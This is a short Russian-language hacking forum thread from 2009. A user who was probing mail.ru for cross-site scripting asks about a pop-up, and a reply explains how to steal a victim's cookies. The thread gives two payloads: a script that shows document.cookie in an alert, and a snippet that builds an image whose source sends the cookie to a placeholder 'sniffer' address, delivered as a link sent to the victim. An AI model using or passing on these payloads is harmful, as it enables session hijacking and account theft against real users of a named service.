Я тут лазил по mail.ru искал XSS, вылитило следующее окно. На то, что было забито в скрипт как предупреждение это не похоже. Так, что это кто нить знает ?
просиш жертву зделать также как и ты зделал с етим скриптом "><script>alert(document.cookie)</script>
и что?
она посмотрит на свои куки=///////
ТС
кидаеш жертве линк с яваскриптом в котором будет (сниффер+document.cookie)
и жди куки)
например что то типа:
'><script>img = new Image();img.src="снифферкартинко"+d ocument.cookie;</script>
Последний раз редактировалось -m0rgan-; 08.03.2009 в 03:42..